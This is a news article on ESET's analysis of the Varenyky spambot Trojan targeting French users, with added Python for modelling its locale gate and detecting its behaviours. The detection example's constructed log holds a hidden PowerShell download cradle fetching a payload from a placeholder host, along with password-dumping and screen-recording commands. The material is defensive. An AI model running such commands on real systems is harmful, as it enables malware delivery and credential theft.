Varenyky spambot Trojan seen in the wild, used to send spam emails

French users are the target of the malicious Varenyky, which records the screen when victims visit adult sites

ESET researchers have observed a new malware strain named Varenyky. The malware sends out spam promoting smartphone offers and also distributes sextortion scam emails. According to the researchers, the malware's features are constantly being changed and improved.

The researchers also found a particularly interesting feature of the malware: it can record the victim's screen as soon as they open a pornographic website:

“This spambot is interesting because it can steal passwords, spy on its victims’ screen using FFmpeg when they watch pornographic content online, and communication to the C&C server is done through Tor, while spam is sent as regular internet traffic.”

The scam email campaign

ESET is not certain how the initial infection took place. The assumption is that financial-themed phishing emails were used to distribute the Trojan at the start, and the researchers soon found a sample of the spam email that carried the initial payload. The email is written in French and includes a .doc attachment that purports to be a bill for a certain amount in euros, which the victim is urged to open. Once opened, the document asks the user to "verify that you are human". In reality, it asks the user to enable macros, and once they are enabled the document's code infects the machine with the Varenyky Trojan.

Malware targets French users

The malicious document mentioned in the previous section has two functions: the first is to deliver the payload, and the second is to check whether the victim's keyboard is set to the French language. For this check, the macro relies on the following function:

Application.LanguageSettings.LanguageID()

The check is for French as used in France specifically, so it excludes other French-speaking countries such as Canada and Belgium. The locale gate also serves to evade automated sample analysis systems and to hinder malware analysts, since the payload does not run on machines whose language settings differ.
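The following Python snippet is an added example, not ESET's code and not the macro itself; it models the locale gate described above so that the difference between "French (France)" and "any French" is visible. The page does not give the exact argument the macro passes to LanguageID, so the example works directly on Windows LCID values, which encode the primary language in the low 10 bits and the region variant in the high 6 bits. The locale table below is constructed for the example.

```python
# Added example: modelling a France-only locale gate versus an "any French" gate.
# Windows LCID layout: bits 0-9 = primary language id, bits 10-15 = sub-language.

# Constructed reference table of French locales and their Windows LCIDs.
FRENCH_LCIDS = {
    0x040C: "fr-FR (France)",       # 1036 decimal
    0x080C: "fr-BE (Belgium)",      # 2060 decimal
    0x0C0C: "fr-CA (Canada)",       # 3084 decimal
    0x100C: "fr-CH (Switzerland)",  # 4108 decimal
    0x140C: "fr-LU (Luxembourg)",   # 5132 decimal
}
LANG_FRENCH = 0x0C   # primary language id shared by every French locale
LCID_FR_FR = 0x040C  # the only value a France-only gate accepts


def primary_language(lcid: int) -> int:
    """Low 10 bits of an LCID: the primary language id (0x0C == French)."""
    return lcid & 0x3FF


def sub_language(lcid: int) -> int:
    """Bits 10-15 of an LCID: the region variant (1 == France for French)."""
    return (lcid >> 10) & 0x3F


def france_only_gate(lcid: int) -> bool:
    """The kind of gate the article describes: run only on fr-FR systems."""
    return lcid == LCID_FR_FR


def any_french_gate(lcid: int) -> bool:
    """A broader gate that would also fire for Belgian, Canadian or Swiss users."""
    return primary_language(lcid) == LANG_FRENCH


def excluded_french_locales() -> list:
    """French locales that an 'any French' gate accepts but a fr-FR gate rejects."""
    return [name for lcid, name in FRENCH_LCIDS.items()
            if any_french_gate(lcid) and not france_only_gate(lcid)]


if __name__ == "__main__":
    for lcid, name in FRENCH_LCIDS.items():
        print(f"{name:22} 0x{lcid:04X}  sub={sub_language(lcid)}  "
              f"france_only={france_only_gate(lcid)}  any_french={any_french_gate(lcid)}")
    print("excluded by the fr-FR gate:", excluded_french_locales())
```

The practical consequence for analysis is that a sandbox whose language settings report anything other than LCID 1036 never reaches the payload stage, so a detonation VM for samples like this should be configured as fr-FR rather than merely "French".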

Malicious Varenyky!

Once on the machine, Varenyky makes a number of changes to the system to gain persistence and begins sending spam. It connects to the command-and-control (C&C) server, reached at a Tor address, to receive commands from the attackers; among those commands it could run PowerShell to download and install additional malware, and it could uninstall the payload. In later versions the PowerShell commands were removed, and NirSoft's WebBrowserPassView and Mail PassView tools are used instead to steal browser and email passwords, which are then sent to the attackers. The latest version uses FFmpeg to record the screen as soon as the word "sexe" appears in the title of the browser window. The scammers use such recordings to craft sextortion emails.
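The behaviours listed in this section (an Office document spawning a PowerShell download, NirSoft password-recovery tools, FFmpeg and a Tor client launched from a user-writable directory) are all visible in process-creation telemetry. The Python below is an added example, not ESET's code and not anything from the malware, that runs a few such detection rules over constructed log lines. It assumes a simple pipe-separated event format (timestamp|parent_image|image|command_line), the NirSoft binary names WebBrowserPassView.exe and mailpv.exe, a Tor client named tor.exe, and the FFmpeg screen-capture arguments; none of these specifics come from the page.

```python
# Added example: detection rules for the Varenyky-style behaviours described above,
# run over constructed process-creation events (not real telemetry).
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessEvent:
    ts: str
    parent: str   # full path of the parent process image
    image: str    # full path of the newly created process image
    cmdline: str  # command line of the new process


# Constructed events in the assumed format timestamp|parent_image|image|command_line.
# Paths, binary names and arguments are illustrative assumptions, not IOCs.
SAMPLE_LOG = r"""
2019-08-01T10:00:01|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/payload.exe','C:\Users\alice\AppData\Local\Temp\payload.exe')"
2019-08-01T10:00:05|C:\Users\alice\AppData\Local\Temp\payload.exe|C:\Users\alice\AppData\Local\Temp\tor.exe|tor.exe
2019-08-01T10:00:09|C:\Users\alice\AppData\Local\Temp\payload.exe|C:\Users\alice\AppData\Local\Temp\WebBrowserPassView.exe|WebBrowserPassView.exe /stext pw.txt
2019-08-01T10:00:10|C:\Users\alice\AppData\Local\Temp\payload.exe|C:\Users\alice\AppData\Local\Temp\mailpv.exe|mailpv.exe /stext mail.txt
2019-08-01T10:12:30|C:\Users\alice\AppData\Local\Temp\payload.exe|C:\Users\alice\AppData\Local\Temp\ffmpeg.exe|ffmpeg.exe -f gdigrab -i desktop rec.mp4
2019-08-01T11:00:00|C:\Windows\explorer.exe|C:\Program Files\ffmpeg\bin\ffmpeg.exe|ffmpeg.exe -i holiday.mov holiday.mp4
2019-08-01T11:05:00|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell Get-ChildItem
""".strip().splitlines()

# Directories a standard user can write to; legitimate tools rarely run from here.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|ProgramData|Public)\\", re.I)
# Common PowerShell download cradles.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
PASSWORD_TOOLS = {"webbrowserpassview.exe", "mailpv.exe"}  # assumed NirSoft binary names


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcessEvent:
    ts, parent, image, cmdline = line.split("|", 3)
    return ProcessEvent(ts, parent, image, cmdline)


def rules_for(ev: ProcessEvent) -> List[str]:
    """Return the names of every rule that fires for one event."""
    hits = []
    img, par = basename(ev.image), basename(ev.parent)
    # Macro document enabling -> PowerShell fetching a second stage.
    if par in OFFICE_APPS and img == "powershell.exe" and DOWNLOAD_CRADLE.search(ev.cmdline):
        hits.append("office_spawns_powershell_download")
    # Screen recording with an FFmpeg binary dropped into a user-writable directory.
    if img == "ffmpeg.exe" and USER_WRITABLE.search(ev.image):
        hits.append("ffmpeg_from_user_writable_path")
    # NirSoft password recovery tools are legitimate but rarely run on end-user hosts.
    if img in PASSWORD_TOOLS:
        hits.append("nirsoft_password_recovery_tool")
    # A Tor client started by an unsigned binary living in a user-writable directory.
    if img == "tor.exe" and USER_WRITABLE.search(ev.parent):
        hits.append("tor_spawned_by_user_writable_binary")
    return hits


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Run every rule over every event; returns (timestamp, rule) pairs."""
    out = []
    for line in lines:
        ev = parse_event(line)
        for rule in rules_for(ev):
            out.append((ev.ts, rule))
    return out


if __name__ == "__main__":
    for ts, rule in scan(SAMPLE_LOG):
        print(ts, rule)
```

The benign FFmpeg conversion launched from Program Files and the plain PowerShell directory listing produce no hits, which is the point of anchoring the rules on the parent process and on the drop location rather than on the tool name alone.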